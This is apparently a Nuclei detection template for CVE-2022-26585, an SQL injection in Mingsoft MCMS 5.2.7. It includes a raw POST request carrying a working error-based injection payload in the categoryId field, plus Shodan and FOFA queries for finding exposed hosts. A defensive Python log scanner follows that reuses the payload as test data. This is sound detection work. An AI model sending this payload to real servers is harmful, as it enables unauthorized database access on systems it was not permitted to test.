Vulnerability Description
Mingsoft MCMS v5.2.7 contains an SQL injection vulnerability via /cms/content/list that allows unauthenticated attackers to execute arbitrary SQL commands on the affected database server.
id: CVE-2022-26585
info:
  name: Mingsoft MCMS v5.2.7 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    Mingsoft MCMS v5.2.7 contains an SQL injection vulnerability via /cms/content/list that allows unauthenticated attackers to execute arbitrary SQL commands on the affected database server.
  remediation: |
    Upgrade Mingsoft MCMS to version 5.2.8 or later, which contains patches for this vulnerability.
  reference:
    - https://gitee.com/mingSoft/MCMS/issues/I4W1S9
    - https://nvd.nist.gov/vuln/detail/CVE-2022-26585
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-26585
    cwe-id: CWE-89
    epss-score: 0.33843
    epss-percentile: 0.9683
    cpe: cpe:2.3:a:mingsoft:mcms:5.2.7:*:*:*:*:*:*:*
  metadata:
    vendor: mingsoft
    product: mcms
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:1464851260
    fofa-query: icon_hash="1464851260"
  tags: cve,cve2022,mingsoft,mcms,sqli
variables:
  num: "999999999"
http:
  - raw:
      - |
        POST /cms/content/list HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        categoryId=2' AND GTID_SUBSET(CONCAT(0x716a717871,md5({{num}}),0x716a627a71),3762) AND 'EIVI'='EIVI
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'c8c605999f3d8352d7bb792cf'
      - type: status
        status:
          - 200
          - 500
# digest: 4a0a00473045022100b3e4126d96a28ba8a8f183ad77db97089d1447ee159957ed1676c6e90ffeb817022040fe99552a403f3fc5986ba1f5a78afc06fe33da9495b8897441ba23d63deb5d:922c64590222798bb761d5b6d8e72950
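
For defenders who cannot upgrade to 5.2.8 immediately, the following added example (not part of the template or of MCMS itself) shows a log or proxy-side check that flags POST requests to /cms/content/list whose categoryId does not look like a plain ID. The allowlist pattern (digits, optionally comma-separated) and the names `SAFE_CATEGORY_ID`, `suspicious_category_ids` and `scan` are assumptions for illustration; adjust the pattern to the ID format your deployment actually uses.

```python
import re
from urllib.parse import parse_qs

TARGET_PATH = "/cms/content/list"

# Assumption: legitimate categoryId values are numeric IDs, optionally
# comma-separated. Anything else (quotes, spaces, parentheses) is flagged.
SAFE_CATEGORY_ID = re.compile(r"[0-9]+(?:,[0-9]+)*")


def suspicious_category_ids(method, path, body):
    """Return decoded categoryId values that fail the allowlist.

    Only form-encoded POST bodies sent to TARGET_PATH are inspected;
    parse_qs URL-decodes values, so percent-encoded quotes are caught too.
    """
    if method.upper() != "POST" or path.split("?", 1)[0] != TARGET_PATH:
        return []
    params = parse_qs(body)
    return [v for v in params.get("categoryId", [])
            if not SAFE_CATEGORY_ID.fullmatch(v)]


def scan(records):
    """Return (index, offending values) for each flagged request record."""
    hits = []
    for i, (method, path, body) in enumerate(records):
        bad = suspicious_category_ids(method, path, body)
        if bad:
            hits.append((i, bad))
    return hits


# Constructed sample records: (method, path, form-encoded body).
SAMPLE_RECORDS = [
    ("POST", "/cms/content/list", "categoryId=2&pageNo=1"),
    ("POST", "/cms/content/list", "categoryId=12,13"),
    # Value shape taken from the template's request above.
    ("POST", "/cms/content/list",
     "categoryId=2' AND GTID_SUBSET(CONCAT(0x716a717871,md5(999999999),"
     "0x716a627a71),3762) AND 'EIVI'='EIVI"),
    ("POST", "/cms/content/list", "categoryId=2%27"),  # encoded quote only
    ("GET", "/cms/content/list", ""),
    ("POST", "/cms/other/list", "categoryId=2%27"),    # different endpoint
]

if __name__ == "__main__":
    for index, values in scan(SAMPLE_RECORDS):
        print(f"record {index}: suspicious categoryId {values!r}")
```
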